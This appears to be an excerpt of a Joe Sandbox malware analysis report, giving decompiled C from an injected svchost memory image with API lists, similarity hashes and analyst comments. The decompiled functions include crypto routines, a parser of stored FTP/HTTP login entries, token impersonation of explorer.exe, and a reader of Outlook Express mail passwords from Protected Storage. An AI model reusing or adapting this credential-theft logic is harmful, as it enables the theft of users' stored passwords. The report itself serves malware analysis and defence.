        _t388 = (_t287 ^ _t336 ^ _t241) + _t385 - 0x155ed806 +  *_t645 + _t241;
        asm("rol ecx, 0x10");
        _t339 = (_t241 ^ _t287 ^ _t388) + _t336 - 0x2b10cf7b +  *((intOrPtr*)(_t645 + 0xc)) + _t388;
        asm("rol ebx, 0x17");
        _t290 = (_t388 ^ _t241 ^ _t339) + _t287 + 0x4881d05 +  *((intOrPtr*)(_t645 + 0x18)) + _t339;
        asm("rol eax, 0x4");
        _t244 = (_t339 ^ _t388 ^ _t290) + _t241 - 0x262b2fc7 +  *((intOrPtr*)(_t645 + 0x24)) + _t290;
        asm("rol edx, 0xb");
        _t391 = (_t290 ^ _t339 ^ _t244) + _t388 - 0x1924661b +  *((intOrPtr*)(_t645 + 0x30)) + _t244;
        asm("rol ecx, 0x10");
        _t342 = (_t244 ^ _t290 ^ _t391) + _t339 + 0x1fa27cf8 +  *((intOrPtr*)(_t645 + 0x3c)) + _t391;
        asm("rol ebx, 0x17");
        _t293 = (_t391 ^ _t244 ^ _t342) + _t290 - 0x3b53a99b +  *((intOrPtr*)(_t645 + 8)) + _t342;
        // Round 4, steps 48-63: I(b,c,d) = c ^ (b | ~d), rotations 6/10/15/21,
        // message words M[7i mod 16]: 0, 7, 14, 5, 12, 3, 10, 1, ... Here the
        // decompiler hoists a + T[i] into a temporary (_t150, _t152, ...) and
        // annotates the unsigned form of the constant (0xf4292243 = -0xbd6ddbc).
        _t150 = _t244 - 0xbd6ddbc; // 0xf4292243
        asm("rol eax, 0x6");
        _t247 = ((0xffffffff ^ _t391 | _t293) ^ _t342) + _t150 +  *_t645 + _t293;
        _t152 = _t391 + 0x432aff97; // 0x1432aff96
        asm("rol edx, 0xa");
        _t394 = ((0xffffffff ^ _t342 | _t247) ^ _t293) + _t152 +  *((intOrPtr*)(_t645 + 0x1c)) + _t247;
        _t155 = _t342 - 0x546bdc59; // 0xab9423a6
        asm("rol ecx, 0xf");
        _t345 = ((0xffffffff ^ _t293 | _t394) ^ _t247) + _t155 +  *((intOrPtr*)(_t645 + 0x38)) + _t394;
        _t158 = _t293 - 0x36c5fc7; // 0xfc93a038
        asm("rol ebx, 0x15");
        _t296 = ((0xffffffff ^ _t247 | _t345) ^ _t394) + _t158 +  *((intOrPtr*)(_t645 + 0x14)) + _t345;
        _t161 = _t247 + 0x655b59c3; // 0x1655b59c2
        asm("rol eax, 0x6");
        _t250 = ((0xffffffff ^ _t394 | _t296) ^ _t345) + _t161 +  *((intOrPtr*)(_t645 + 0x30)) + _t296;
        _t164 = _t394 - 0x70f3336e; // 0x8f0ccc91
        asm("rol edx, 0xa");
        _t397 = ((0xffffffff ^ _t345 | _t250) ^ _t296) + _t164 +  *((intOrPtr*)(_t645 + 0xc)) + _t250;
        _t167 = _t345 - 0x100b83; // 0xffeff47c
        asm("rol ecx, 0xf");
        _t348 = ((0xffffffff ^ _t296 | _t397) ^ _t250) + _t167 +  *((intOrPtr*)(_t645 + 0x28)) + _t397;
        _t170 = _t296 - 0x7a7ba22f; // 0x85845dd0
        asm("rol ebx, 0x15");
        _t299 = ((0xffffffff ^ _t250 | _t348) ^ _t397) + _t170 +  *((intOrPtr*)(_t645 + 4)) + _t348;
        _t173 = _t250 + 0x6fa87e4f; // 0x16fa87e4e
        asm("rol eax, 0x6");
        _t253 = ((0xffffffff ^ _t397 | _t299) ^ _t348) + _t173 +  *((intOrPtr*)(_t645 + 0x20)) + _t299;
        _t176 = _t397 - 0x1d31920; // 0xfe2ce6df
        asm("rol edx, 0xa");
        _t400 = ((0xffffffff ^ _t348 | _t253) ^ _t299) + _t176 +  *((intOrPtr*)(_t645 + 0x3c)) + _t253;
        _t179 = _t348 - 0x5cfebcec; // 0xa3014313
        asm("rol ecx, 0xf");
        _t351 = ((0xffffffff ^ _t299 | _t400) ^ _t253) + _t179 +  *((intOrPtr*)(_t645 + 0x18)) + _t400;
        _t182 = _t299 + 0x4e0811a1; // 0x14e0811a0
        asm("rol ebx, 0x15");
        _t302 = ((0xffffffff ^ _t253 | _t351) ^ _t400) + _t182 +  *((intOrPtr*)(_t645 + 0x34)) + _t351;
        _t185 = _t253 - 0x8ac817e; // 0xf7537e81
        asm("rol eax, 0x6");
        _t256 = ((0xffffffff ^ _t400 | _t302) ^ _t351) + _t185 +  *((intOrPtr*)(_t645 + 0x10)) + _t302;
        _t188 = _t400 - 0x42c50dcb; // 0xbd3af234
        asm("rol edx, 0xa");
        _t403 = ((0xffffffff ^ _t351 | _t256) ^ _t302) + _t188 +  *((intOrPtr*)(_t645 + 0x2c)) + _t256;
        _t191 = _t351 + 0x2ad7d2bb; // 0x12ad7d2ba
                                                                                                                                        					asm("rol ecx, 0xf");
                                                                                                                                        					_t354 = ((0xffffffff ^ _t302 | _t403) ^ _t256) + _t191 +  *((intOrPtr*)(_t645 + 8)) + _t403;
                                                                                                                                        					_t194 = _t302 - 0x14792c6f; // 0xeb86d390
                                                                                                                                        					asm("rol ebx, 0x15");
                                                                                                                                        					_t404 = _a4;
                                                                                                                                        					 *_t404 =  *_t404 + _t256;
                                                                                                                                        					 *(_t404 + 4) =  *(_t404 + 4) + ((0xffffffff ^ _t256 | _t354) ^ _t403) + _t194 +  *((intOrPtr*)(_t645 + 0x24)) + _t354;
                                                                                                                                        					 *(_t404 + 8) =  *(_t404 + 8) + _t354;
                                                                                                                                        					 *(_t404 + 0xc) =  *(_t404 + 0xc) + _t403;
                                                                                                                                        					_t203 =  &_v8;
                                                                                                                                        					 *_t203 = _v8 - 1;
                                                                                                                                        					_t645 = _t645 + 0x40;
                                                                                                                                        				} while ( *_t203 >= 0);
                                                                                                                                        				return _t256;
                                                                                                                                        			}

Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
• Instruction ID: 87772c69faaf583724149594d3153b37e2a39dedebadf45f128ff790bfb95947
• Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
• Instruction Fuzzy Hash: 89121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
Uniqueness

Uniqueness Score: 0.00%

C-Code - Quality: 100%
			E1000D46A(void* __eax, signed int* _a4, signed int* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int* _t39;
				signed int* _t40;
				signed int* _t41;
				signed int* _t42;
				signed int* _t68;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				signed int _t101;
                                                                                                                                        				signed int _t106;
                                                                                                                                        				signed int _t107;
                                                                                                                                        				signed int _t108;
                                                                                                                                        				signed int _t109;
                                                                                                                                        				signed int _t112;
                                                                                                                                        				unsigned int _t113;
                                                                                                                                        				signed int _t115;
                                                                                                                                        				signed int _t116;
                                                                                                                                        				signed int _t117;
                                                                                                                                        				signed int _t118;
                                                                                                                                        				signed int _t119;
                                                                                                                                        				signed int _t121;
                                                                                                                                        				signed int _t122;
                                                                                                                                        				signed int _t123;
                                                                                                                                        				signed int _t124;
                                                                                                                                        				signed int _t125;
                                                                                                                                        				signed int _t128;
                                                                                                                                        				signed int _t131;
                                                                                                                                        				signed int _t132;
                                                                                                                                        				signed int _t133;
                                                                                                                                        				signed int _t134;
                                                                                                                                        
                                                                                                                                        				_t39 = _a8;
                                                                                                                                        				_t121 =  *_a4;
                                                                                                                                        				_t106 = _a4[1];
                                                                                                                                        				_t73 = (_t121 >> 0x00000004 ^ _t106) & 0x0f0f0f0f;
                                                                                                                                        				_t107 = _t106 ^ _t73;
                                                                                                                                        				_t122 = _t121 ^ _t73 << 0x00000004;
                                                                                                                                        				_t75 = (_t122 >> 0x00000010 ^ _t107) & 0x0000ffff;
                                                                                                                                        				_t108 = _t107 ^ _t75;
                                                                                                                                        				_t123 = _t122 ^ _t75 << 0x00000010;
                                                                                                                                        				_t77 = (_t108 >> 0x00000002 ^ _t123) & 0x33333333;
                                                                                                                                        				_t124 = _t123 ^ _t77;
                                                                                                                                        				_t109 = _t108 ^ _t77 << 0x00000002;
                                                                                                                                        				_t79 = (_t109 >> 0x00000008 ^ _t124) & 0x00ff00ff;
                                                                                                                                        				_t125 = _t124 ^ _t79;
                                                                                                                                        				_t112 = (_t109 ^ _t79 << 0x00000008) + (_t109 ^ _t79 << 0x00000008) | (_t109 ^ _t79 << 0x00000008) >> 0x0000001f & 0x00000001;
                                                                                                                                        				_t81 = (_t125 ^ _t112) & 0xaaaaaaaa;
                                                                                                                                        				_t113 = _t112 ^ _t81;
                                                                                                                                        				_t128 = (_t125 ^ _t81) + (_t125 ^ _t81) | (_t125 ^ _t81) >> 0x0000001f & 0x00000001;
                                                                                                                                        				_v8 = 8;
                                                                                                                                        				do {
                                                                                                                                        					_t40 =  &(_t39[1]);
                                                                                                                                        					_v12 =  *(0x10011c88 + (((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) & 0x0000003f) * 4) |  *((((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) >> 0x00000006 & 0x000000fc) + 0x10011a88) |  *((((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) >> 0x0000000e & 0x000000fc) + 0x10011888) |  *((((_t113 << 0x0000001c | _t113 >> 0x00000004) ^  *_t39) >> 0x00000016 & 0x000000fc) + 0x10011688);
                                                                                                                                        					_t41 =  &(_t40[1]);
                                                                                                                                        					_t128 = _t128 ^ ( *(0x10011d88 + ((_t113 ^  *_t40) & 0x0000003f) * 4) | _v12 |  *(((_t113 ^  *_t40) >> 0x00000006 & 0x000000fc) + 0x10011b88) |  *(((_t113 ^  *_t40) >> 0x0000000e & 0x000000fc) + 0x10011988) |  *(((_t113 ^  *_t40) >> 0x00000016 & 0x000000fc) + 0x10011788));
                                                                                                                                        					_t42 =  &(_t41[1]);
                                                                                                                                        					_v12 =  *(0x10011c88 + (((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) & 0x0000003f) * 4) |  *((((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) >> 0x00000006 & 0x000000fc) + 0x10011a88) |  *((((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) >> 0x0000000e & 0x000000fc) + 0x10011888) |  *((((_t128 << 0x0000001c | _t128 >> 0x00000004) ^  *_t41) >> 0x00000016 & 0x000000fc) + 0x10011688);
                                                                                                                                        					_t39 =  &(_t42[1]);
                                                                                                                                        					_t113 = _t113 ^ ( *(0x10011d88 + ((_t128 ^  *_t42) & 0x0000003f) * 4) | _v12 |  *(((_t128 ^  *_t42) >> 0x00000006 & 0x000000fc) + 0x10011b88) |  *(((_t128 ^  *_t42) >> 0x0000000e & 0x000000fc) + 0x10011988) |  *(((_t128 ^  *_t42) >> 0x00000016 & 0x000000fc) + 0x10011788));
                                                                                                                                        					_v8 = _v8 - 1;
                                                                                                                                        				} while (_v8 != 0);
                                                                                                                                        				_t115 = _t113 << 0x0000001f | _t113 >> 0x00000001;
                                                                                                                                        				_t93 = (_t128 ^ _t115) & 0xaaaaaaaa;
                                                                                                                                        				_t116 = _t115 ^ _t93;
                                                                                                                                        				_t131 = (_t128 ^ _t93) << 0x0000001f | (_t128 ^ _t93) >> 0x00000001;
                                                                                                                                        				_t95 = (_t131 >> 0x00000008 ^ _t116) & 0x00ff00ff;
                                                                                                                                        				_t117 = _t116 ^ _t95;
                                                                                                                                        				_t132 = _t131 ^ _t95 << 0x00000008;
                                                                                                                                        				_t97 = (_t132 >> 0x00000002 ^ _t117) & 0x33333333;
                                                                                                                                        				_t118 = _t117 ^ _t97;
                                                                                                                                        				_t133 = _t132 ^ _t97 << 0x00000002;
                                                                                                                                        				_t99 = (_t118 >> 0x00000010 ^ _t133) & 0x0000ffff;
                                                                                                                                        				_t134 = _t133 ^ _t99;
                                                                                                                                        				_t119 = _t118 ^ _t99 << 0x00000010;
                                                                                                                                        				_t101 = (_t119 >> 0x00000004 ^ _t134) & 0x0f0f0f0f;
                                                                                                                                        				 *_a4 = _t101 << 0x00000004 ^ _t119;
                                                                                                                                        				_t68 = _a4;
                                                                                                                                        				_t68[1] = _t134 ^ _t101;
                                                                                                                                        				return _t68;
                                                                                                                                        			}

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e1df6c7488eebae5d475b4fc4d045cb470c92537486541aeb35f73e01c95e60d
                                                                                                                                        • Instruction ID: 2a3a59f7a4ab1595d84f0d06739809a477139a948796cae1d0435f603c943839
                                                                                                                                        • Opcode Fuzzy Hash: e1df6c7488eebae5d475b4fc4d045cb470c92537486541aeb35f73e01c95e60d
                                                                                                                                        • Instruction Fuzzy Hash: 4961B037F516364BE75C8EAA9C81155E692ABC8320B5F827DCE09F7381C9B4FD5286C0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2fad537a8198f7557bf06baeca17a023b996e97923a2d2ef9918eaa794762a2c
                                                                                                                                        • Instruction ID: 1dd41cb7f6162bd084e35b68c4fe481a0ed87936269b80ebfc0e558275d70ebd
                                                                                                                                        • Opcode Fuzzy Hash: 2fad537a8198f7557bf06baeca17a023b996e97923a2d2ef9918eaa794762a2c
                                                                                                                                        • Instruction Fuzzy Hash: 4DD06C31221895CFC781DF29D080E81B3E4EB08724B0684D2E805CFA22D274FD41CB40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E10006D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				char _v20;
                                                                                                                                        				int _v24;
                                                                                                                                        				int _v28;
                                                                                                                                        				int* _v32;
                                                                                                                                        				int* _v36;
                                                                                                                                        				int* _v40;
                                                                                                                                        				int* _v44;
                                                                                                                                        				int* _v48;
                                                                                                                                        				CHAR* _v52;
                                                                                                                                        				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				char* _v68;
				int _v72;
				int _v76;
				int _v80;
				void* _t85;
				int _t87;
				int _t90;
				int _t94;
				int _t101;
				int _t108;
				int _t110;
				int _t115;
				int _t133;
				int _t136;
				int _t138;
				void* _t140;
				int _t141;
				int* _t143;

				_t85 = E10001EEF(_a8);
				if(_t85 != 0) {
					_t87 = E10004137(_a8);
					__eflags = _t87;
					if(_t87 == 0) {
						E10006B0B(_a12, _a16);
						_t90 = E10001FB7(__eflags, _a8,  &_v20);
						__eflags = _t90;
						if(_t90 != 0) {
							_t94 = E100025C0(_v12, _v8);
							__eflags = _t94;
							if(_t94 != 0) {
								_v24 = _t94;
								_t143 = _t94;
								__eflags =  *_t143;
								if(__eflags != 0) {
									_v52 = E10006D38(__eflags, _t143);
									_push(lstrcmpA("#2c", _v52));
									_push(lstrcmpA("#2d", _v52));
									_t101 = lstrcmpA("#2e", _v52);
									_pop(_t141);
									_pop(_t138);
									__eflags = _t101;
									if(_t101 == 0) {
										L10:
										__eflags = _t138;
										if(_t138 != 0) {
											_v80 = 0;
										} else {
											_v80 = 1;
										}
										asm("cld");
										_t140 = 0xffffffff;
										asm("repne scasb");
										__eflags =  *_t143;
										if ( *_t143 != 0) goto L14;
										_v28 = 0;
										while(1) {
											__eflags =  *_t143;
											if(__eflags == 0) {
												goto L54;
											}
											_v56 = E10006D38(__eflags, _t143);
											__eflags = _v28;
											if(_v28 != 0) {
												__eflags = _v28 - 1;
												if(_v28 != 1) {
													__eflags = _v28 - 2;
													if(_v28 != 2) {
														__eflags = _v28 - 3;
														if(_v28 != 3) {
															__eflags = _v28 - 4;
															if(_v28 != 4) {
																__eflags = _v28 - 5;
																if(_v28 != 5) {
																	__eflags = _v28 - 6;
																	if(_v28 == 6) {
																		_v28 = 2;
																	}
																} else {
																	_v48 = _t143;
																	__eflags = _v80;
																	if(__eflags == 0) {
																		_v28 = 6;
																	} else {
																		_v28 = 2;
																	}
																	_v68 = 0;
																	_v60 = 0;
																	_v64 = 0;
																	_v72 = 0;
																	_v76 = 0;
																	_v68 = E10006D38(__eflags, _v32);
																	_v60 = E10006D38(__eflags, _v40);
																	_v64 = E10006D38(__eflags, _v48);
																	__eflags =  *0x10010155;
																	if( *0x10010155 != 0) {
																		__eflags =  *0x10010155 - 1;
																		if( *0x10010155 != 1) {
																			_t115 = 0;
																			__eflags = 0;
																		} else {
																			_t115 = StrCmpNIA(_v68, "ftp.", lstrlenA("ftp."));
																		}
																	} else {
																		_t133 = StrCmpNIA(_v68, "ftp://", lstrlenA("ftp://"));
																		__eflags = _t133;
																		if(_t133 != 0) {
																			_t133 = StrCmpNIA(_v68, "http://", lstrlenA("http://"));
																		}
																		_t115 = _t133;
																		__eflags = _t115;
																		if(_t115 != 0) {
																			_t115 = StrCmpNIA(_v68, "https://", lstrlenA("https://"));
																		}
																	}
																	__eflags = _t115;
																	if(_t115 == 0) {
																		_v72 = E10006BEC(_t140, _v60, lstrlenA(_v60));
																		_v76 = E10006BEC(_t140, _v64, lstrlenA(_v64));
																		__eflags = _v68;
																		if(_v68 != 0) {
																			__eflags = _v76;
																			if(_v76 != 0) {
																				E10001522(_a4, 0xbeef0000);
																				E10001584(_a4, _v68);
																				E10001584(_a4, _v72);
																				E10001584(_a4, _v76);
																			}
																		}
																	}
																	E10001871(_v68);
																	E10001871(_v60);
																	E10001871(_v64);
																	E10001871(_v72);
																	E10001871(_v76);
																}
															} else {
																_v44 = _t143;
																_v28 = 5;
															}
														} else {
															_v40 = _t143;
															_v28 = 4;
														}
													} else {
														_v36 = _t143;
														_v28 = 3;
													}
												} else {
													_v32 = _t143;
													_v28 = 2;
												}
												__eflags = _v28;
												if(_v28 != 0) {
													_t108 = lstrcmpA(_v56, 0x1000f8fd);
													__eflags = _t108;
													if(_t108 == 0) {
														_v28 = 1;
													}
													_t110 = lstrcmpA(_v56, "---");
													__eflags = _t110;
													if(_t110 == 0) {
														_v28 = 2;
													}
												}
											} else {
												_t136 = lstrcmpA(_v56, 0x1000f8fd);
												__eflags = _t136;
												if(_t136 == 0) {
													_v28 = 1;
												}
											}
											E10001871(_v56);
											asm("cld");
											_t140 = 0xffffffff;
											asm("repne scasb");
											__eflags =  *_t143;
											if( *_t143 != 0) {
												continue;
											}
											goto L54;
										}
									} else {
										__eflags = _t141;
										if(_t141 == 0) {
											goto L10;
										} else {
											_t138 = _t138;
											__eflags = _t138;
											if(_t138 == 0) {
												goto L10;
											}
										}
									}
									L54:
									E10001871(_v52);
								}
								E10001871(_v24);
							}
							E1000204C( &_v20);
						}
						return E10006BC3();
					} else {
						return _t87;
					}
				} else {
					return _t85;
				}
			}

Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
• API String ID: 0-1526611526
• Opcode ID: 724ba7b4f942c0c7724bbe666324037727e47c4a0af3658c954cc083d4f00e14
• Instruction ID: 2075b8312cb01d267929bb0c54c36726008812060f9829873acf7dd839938290
• Opcode Fuzzy Hash: 724ba7b4f942c0c7724bbe666324037727e47c4a0af3658c954cc083d4f00e14
• Instruction Fuzzy Hash: DE915779D0024AEAFF11DFA0DC46BEEBAB2FF043C4F204125F114A50A9DB799A91DB51
Uniqueness
Uniqueness Score: 100.00%

C-Code - Quality: 76%
E10002D12() {
	void* _t30;
	int _t33;
	void* _t41;
	void* _t44;
	void* _t53;
	void* _t57;
	int _t59;
	void* _t60;

	_t57 = 0;
	 *((intOrPtr*)(_t60 - 0xc)) =  *0x1000f498();
	/* Analyst annotation: _t60 - 0x134 is a PROCESSENTRY32 on the stack; 0x128 is its ANSI dwSize. */
	 *(_t60 - 0x134) = 0x128;
	/* Analyst annotation: 2 == TH32CS_SNAPPROCESS, i.e. a snapshot of all running processes. */
	_t30 = CreateToolhelp32Snapshot(2, 0);
	if(_t30 != 0xffffffff) {
		 *(_t60 - 0x138) = _t30;
		_t33 = Process32First( *(_t60 - 0x138), _t60 - 0x134);
		while(_t33 != 0) {
			/* Analyst annotation: _t60 - 0x110 is PROCESSENTRY32.szExeFile (offset 0x24); the loop walks the process list looking for explorer.exe. */
			if(StrStrIA(_t60 - 0x110, "explorer.exe") == 0) {
                                                                                                                                        							L18:
                                                                                                                                        							_t33 = Process32Next( *(_t60 - 0x138), _t60 - 0x134);
                                                                                                                                        							continue;
                                                                                                                                        						} else {
                                                                                                                                        							 *(_t60 - 0x13c) = 0;
                                                                                                                                        							_t41 =  *0x1000f49c( *(_t60 - 0x12c), _t60 - 0x13c);
                                                                                                                                        							_t59 =  *(_t60 - 0x13c);
                                                                                                                                        							if(_t41 == 0 || _t59 !=  *((intOrPtr*)(_t60 - 0xc))) {
                                                                                                                                        								goto L18;
                                                                                                                                        							} else {
                                                                                                                                        								_t44 = OpenProcess(0x2000000, 0,  *(_t60 - 0x12c));
                                                                                                                                        								if(_t44 == 0) {
                                                                                                                                        									goto L18;
                                                                                                                                        								} else {
                                                                                                                                        									 *(_t60 - 8) = _t44;
                                                                                                                                        									if(OpenProcessToken( *(_t60 - 8), 0x201eb, _t60 - 4) == 0) {
                                                                                                                                        										CloseHandle( *(_t60 - 8));
                                                                                                                                        										goto L18;
                                                                                                                                        									} else {
                                                                                                                                        										if(ImpersonateLoggedOnUser( *(_t60 - 4)) == 0) {
                                                                                                                                        											CloseHandle( *(_t60 - 4));
                                                                                                                                        											CloseHandle( *(_t60 - 8));
                                                                                                                                        											goto L18;
                                                                                                                                        										} else {
                                                                                                                                        											_t57 = _t57 + 1;
                                                                                                                                        											 *(_t60 - 0x140) = 0;
                                                                                                                                        											_t53 = _t60 - 0x140;
                                                                                                                                        											_push(_t53);
                                                                                                                                        											_push(0xf003f);
                                                                                                                                        											L1000BAD0();
                                                                                                                                        											if(_t53 == 0 &&  *(_t60 - 0x140) != 0) {
                                                                                                                                        												 *0x1000f159 =  *(_t60 - 0x140);
                                                                                                                                        											}
                                                                                                                                        											if( *((intOrPtr*)(_t60 + 8)) != 0) {
                                                                                                                                        												 *__eax =  *(_t60 - 4);
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					CloseHandle( *(_t60 - 0x138));
                                                                                                                                        				}
                                                                                                                                        				return _t57;
                                                                                                                                        			}


APIs
• WTSGetActiveConsoleSessionId.KERNEL32(10002CE7,?,?,1000B78A,?), ref: 10002D14
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10002D2B
• Process32First.KERNEL32(?,00000128), ref: 10002D4C
• StrStrIA.SHLWAPI(?,explorer.exe), ref: 10002D65
• ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe), ref: 10002D89
• OpenProcess.KERNEL32(02000000,00000000,?), ref: 10002DB3
• OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 10002DCF
• ImpersonateLoggedOnUser.ADVAPI32(?), ref: 10002DDC
• RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 10002DFD
• Process32Next.KERNEL32 ref: 10002E52
• CloseHandle.KERNEL32(?), ref: 10002E62
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: OpenProcess$Process32SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedNextSnapshotTokenToolhelp32
• String ID: explorer.exe
• API String ID: 2643599891-3187896405
• Opcode ID: 77f4010b4860d918ae7ab91ce8beb468eb98fa66940ba223bd9168f6a0119d09
• Instruction ID: 96c394887a566ec73a4a06e538481041d9d39d70be7eea2e8df390db5540fba8
• Opcode Fuzzy Hash: 77f4010b4860d918ae7ab91ce8beb468eb98fa66940ba223bd9168f6a0119d09
• Instruction Fuzzy Hash: FF310E31940659EBEF62DF60CC86BEDBBB4EB043C4F1000A5E619A5069DB749F94DF10
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 96%
			/* Decompiler output (Joe Sandbox IDA plugin). Callback over Protected Storage items:
			   _a20 is a COM interface whose method at vtable offset 0x44 reads an item; the type
			   and subtype names are converted to ANSI and compared against the Outlook Express /
			   Windows Mail credential stores ("identification" / "identitymgr" with subtype
			   "inetcomm server passwords", "outlook account manager passwords" or "identities").
			   _v3104 is a tag (0xbeef0005..0xbeef0007) identifying which store matched, passed
			   on to E1000A9EF. This is the mail credential access the report flags. */
			E1000AADE(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				char _v3076;
				int _v3080;
				int _v3084;
				intOrPtr _v3088;
				char _v3092;
				char _v3096;
				char _v3100;
				intOrPtr _v3104;
				void* _t56;
				int _t61;
				void* _t66;

				_t66 = __ecx;
				E1000795C(_a4,  &_v1028, _a20);           /* type name  -> _v1028 */
				E100079A7(_a4, _a8,  &_v2052, _a20);      /* subtype name -> _v2052 */
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);    /* item name -> ANSI */
				_v3092 = 0x10;
				_v3088 = 2;
				_v3084 = 0;
				_v3080 = 0;
				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);    /* read item: length -> _v3100, data -> _v3096 */
				if(_v3100 == 0 || _v3096 == 0) {
					return _t56;
				} else {
					if(lstrcmpiA( &_v1028, "identification") == 0) {
						L4:
						_v3104 = 0xbeef0005;
						if(lstrcmpiA( &_v2052, "inetcomm server passwords") == 0) {
							L7:
							if(_v3104 != 0xbeef0007) {
								_t61 = E1000A9EF(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
							} else {
								_t61 = E1000A9EF(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
							}
							L10:
							_push(_v3096);
							L1000BA70();    /* free the item buffer */
							return _t61;
						}
						_v3104 = 0xbeef0006;
						if(lstrcmpiA( &_v2052, "outlook account manager passwords") == 0) {
							goto L7;
						}
						_v3104 = 0xbeef0007;
						_t61 = lstrcmpiA( &_v2052, "identities");
						if(_t61 != 0) {
							goto L10;
						}
						goto L7;
					}
					_t61 = lstrcmpiA( &_v1028, "identitymgr");
					if(_t61 != 0) {
						goto L10;
					}
					goto L4;
				}
			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1000795C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 10007995
                                                                                                                                          • Part of subcall function 1000795C: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 1000799E
                                                                                                                                          • Part of subcall function 100079A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 100079E3
                                                                                                                                          • Part of subcall function 100079A7: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 100079EC
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 1000AB27
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identification), ref: 1000ABA7
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identitymgr,?,identification), ref: 1000ABBC
                                                                                                                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords,?,identification), ref: 1000ABDF
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 1000ABFE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identities,?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 1000AC1D
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 1000AC7E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
